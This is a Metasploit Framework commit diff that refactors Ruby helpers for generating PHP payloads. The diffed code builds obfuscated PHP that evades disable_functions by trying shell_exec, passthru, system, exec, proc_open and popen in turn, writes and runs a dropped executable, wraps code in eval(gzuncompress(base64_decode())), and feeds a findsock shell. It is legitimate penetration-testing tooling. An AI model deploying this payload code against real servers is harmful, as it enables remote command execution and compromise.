Define the system_block module function

zeroSteiner · zeroSteiner · commit 1705cb7aa59f · 2025-05-22T10:37:48.000-04:00
diff --git a/lib/msf/core/exploit/php_exe.rb b/lib/msf/core/exploit/php_exe.rb
@@ -49,15 +49,17 @@ def get_write_exec_payload(opts={})
         print_warning("Unable to clean up #{bin_name}, delete it manually")
       end
       p = Rex::Text.encode_base64(generate_payload_exe)
+      vars = Rex::RandomIdentifier::Generator.new
+      dis = "$#{vars[:dis]}"
       php = %Q{
-      #{php_preamble}
+      #{php_preamble(disabled_varname: dis)}
       $ex = "#{bin_name}";
       $f = fopen($ex, "wb");
       fwrite($f, base64_decode("#{p}"));
       fclose($f);
       chmod($ex, 0777);
       function my_cmd($cmd) {
-      #{php_system_block};
+      #{php_system_block(disabled_varname: dis)};
       }
       if (FALSE === strpos(strtolower(PHP_OS), 'win' )) {
         my_cmd($ex . "&");
diff --git a/lib/msf/core/payload/php.rb b/lib/msf/core/payload/php.rb
@@ -16,15 +16,14 @@ module Msf::Payload::Php
   #
   # @return [String] A chunk of PHP code
   #
-  def php_preamble(options = {})
+  def self.preamble(options = {})
     dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     dis = '$' + dis if (dis[0,1] != '$')
 
-    @dis = dis
-
     # Canonicalize the list of disabled functions to facilitate choosing a
     # system-like function later.
-    preamble = "/*<?php /**/
+    <<~TEXT
+      /*<?php /**/
       @error_reporting(0);@set_time_limit(0);@ignore_user_abort(1);@ini_set('max_execution_time',0);
       #{dis}=@ini_get('disable_functions');
       if(!empty(#{dis})){
@@ -34,8 +33,11 @@ def php_preamble(options = {})
       }else{
         #{dis}=array();
       }
-      "
-    return preamble
+    TEXT
+  end
+
+  def php_preamble(options = {})
+    Msf::Payload::Php.preamble(options)
   end
 
   #
@@ -52,63 +54,70 @@ def php_preamble(options = {})
   # @return [String] A chunk of PHP code that, with a little luck, will run a
   #   command.
   #
-  def php_system_block(options = {})
+  def self.system_block(options = {})
     cmd = options[:cmd_varname] || '$cmd'
-    dis = options[:disabled_varname] || @dis || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
+    dis = options[:disabled_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     output = options[:output_varname] || '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
 
-    if (@dis.nil?)
-      @dis = dis
-    end
-
     cmd    = '$' + cmd if (cmd[0,1] != '$')
     dis    = '$' + dis if (dis[0,1] != '$')
     output = '$' + output if (output[0,1] != '$')
 
     is_callable = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
     in_array    = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
 
-    setup = "
+    setup = ''
+    if options[:cmd]
+      setup << <<~TEXT
+        #{cmd}=gzuncompress(base64_decode('#{Rex::Text.encode_base64(Rex::Text.zlib_deflate(options[:cmd]))}'));
+      TEXT
+    end
+    setup << <<~TEXT
       if (FALSE!==stristr(PHP_OS,'win')){
         #{cmd}=#{cmd}.\" 2>&1\\n\";
       }
       #{is_callable}='is_callable';
       #{in_array}='in_array';
-      "
-    shell_exec = "
+    TEXT
+    shell_exec = <<~TEXT
       if(#{is_callable}('shell_exec')&&!#{in_array}('shell_exec',#{dis})){
         #{output}=`#{cmd}`;
-      }else"
-    passthru = "
+      }else
+    TEXT
+    passthru = <<~TEXT
       if(#{is_callable}('passthru')&&!#{in_array}('passthru',#{dis})){
         ob_start();
         passthru(#{cmd});
         #{output}=ob_get_contents();
         ob_end_clean();
-      }else"
-    system = "
+      }else
+    TEXT
+    system = <<~TEXT
       if(#{is_callable}('system')&&!#{in_array}('system',#{dis})){
         ob_start();
         system(#{cmd});
         #{output}=ob_get_contents();
         ob_end_clean();
-      }else"
-    exec = "
+      }else
+    TEXT
+    exec = <<~TEXT
       if(#{is_callable}('exec')&&!#{in_array}('exec',#{dis})){
         #{output}=array();
         exec(#{cmd},#{output});
         #{output}=join(chr(10),#{output}).chr(10);
-      }else"
-    proc_open = "
+      }else
+    TEXT
+    proc_open = <<~TEXT
       if(#{is_callable}('proc_open')&&!#{in_array}('proc_open',#{dis})){
         $handle=proc_open(#{cmd},array(array('pipe','r'),array('pipe','w'),array('pipe','w')),$pipes);
         #{output}=NULL;
         while(!feof($pipes[1])){
           #{output}.=fread($pipes[1],1024);
         }
         @proc_close($handle);
-      }else"
-    popen = "
+      }else
+    TEXT
+    popen = <<~TEXT
       if(#{is_callable}('popen')&&!#{in_array}('popen',#{dis})){
         $fp=popen(#{cmd},'r');
         #{output}=NULL;
@@ -118,7 +127,8 @@ def php_system_block(options = {})
           }
         }
         @pclose($fp);
-      }else"
+      }else
+    TEXT
     # Currently unused until we can figure out how to get output with COM
     # objects (which are not subject to safe mode restrictions) instead of
     # PHP functions.
@@ -128,21 +138,25 @@ def php_system_block(options = {})
     #		$wscript->run(#{cmd} . ' > %TEMP%\\out.txt');
     #		#{output} = file_get_contents('%TEMP%\\out.txt');
     #	}else"
-    fail_block = "
+    fail_block = <<~TEXT
       {
         #{output}=0;
       }
-    "
+    TEXT
 
     exec_methods = [passthru, shell_exec, system, exec, proc_open, popen]
     exec_methods = exec_methods.shuffle
     setup + exec_methods.join("") + fail_block
   end
 
-  def self.create_exec_stub(php_code, wrap_in_tags: true)
+  def php_system_block(options = {})
+    Msf::Payload::Php.system_block(options)
+  end
+
+  def self.create_exec_stub(php_code, options = {})
     payload = Rex::Text.encode_base64(Rex::Text.zlib_deflate(php_code))
     b64_stub = "eval(gzuncompress(base64_decode('#{payload}')));"
-    b64_stub = "<?php #{b64_stub} ?>" if wrap_in_tags
+    b64_stub = "<?php #{b64_stub} ?>" if options.fetch(:wrap_in_tags, true)
     b64_stub
   end
 
diff --git a/modules/payloads/singles/php/shell_findsock.rb b/modules/payloads/singles/php/shell_findsock.rb
@@ -40,16 +40,18 @@ def initialize(info = {})
   end
 
   def php_findsock
-    var_cmd = '$' + Rex::Text.rand_text_alpha(6..9)
-    var_fd = '$' + Rex::Text.rand_text_alpha(6..9)
-    var_out = '$' + Rex::Text.rand_text_alpha(6..9)
+    vars = Rex::RandomIdentifier::Generator.new
+    var_cmd = '$' + vars[:var_cmd]
+    var_fd = '$' + vars[:var_fd]
+    var_out = '$' + vars[:var_out]
+    var_dis = '$' + vars[:var_dis]
     shell = <<~END_OF_PHP_CODE
-      #{php_preamble}
+      #{php_preamble(disabled_varname: var_dis)}
       print("<html><body>");
       flush();
 
       function mysystem(#{var_cmd}){
-        #{php_system_block(cmd_varname: var_cmd, output_varname: var_out)}
+        #{php_system_block(disabled_varname: var_dis, cmd_varname: var_cmd, output_varname: var_out)}
         return #{var_out};
       }
 
